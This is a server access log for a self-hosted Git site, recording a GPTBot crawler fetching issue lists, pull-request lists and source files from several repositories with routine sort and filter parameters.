"/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12504] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/tasks.json" +[17/Feb/2026:18:16:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:18:16:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=closed&type=all" +[17/Feb/2026:18:16:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 14178] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Hero.tsx" +[17/Feb/2026:18:16:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:16:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.spec?display=rendered" [Client 74.7.227.38] [Length 11140] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.spec" +[17/Feb/2026:18:16:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:16:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:16:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:16:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:16:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/index.html?display=source" [Client 74.7.227.38] [Length 14632] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/index.html" +[17/Feb/2026:18:16:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:18:16:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&state=closed&type=all" +[17/Feb/2026:18:16:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 19269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/Project%20Planning-1.md" +[17/Feb/2026:18:16:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:18:16:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:18:16:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 9072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.py" +[17/Feb/2026:18:16:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11611] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:18:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:18:16:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:16:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&state=closed&type=all" +[17/Feb/2026:18:16:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:16:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10778] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:16:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:16:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:16:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:16:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:16:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:16:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:16:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:16:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:16:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=closed&type=all" +[17/Feb/2026:18:16:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=open&type=all" +[17/Feb/2026:18:16:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:16:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:16:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:17:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 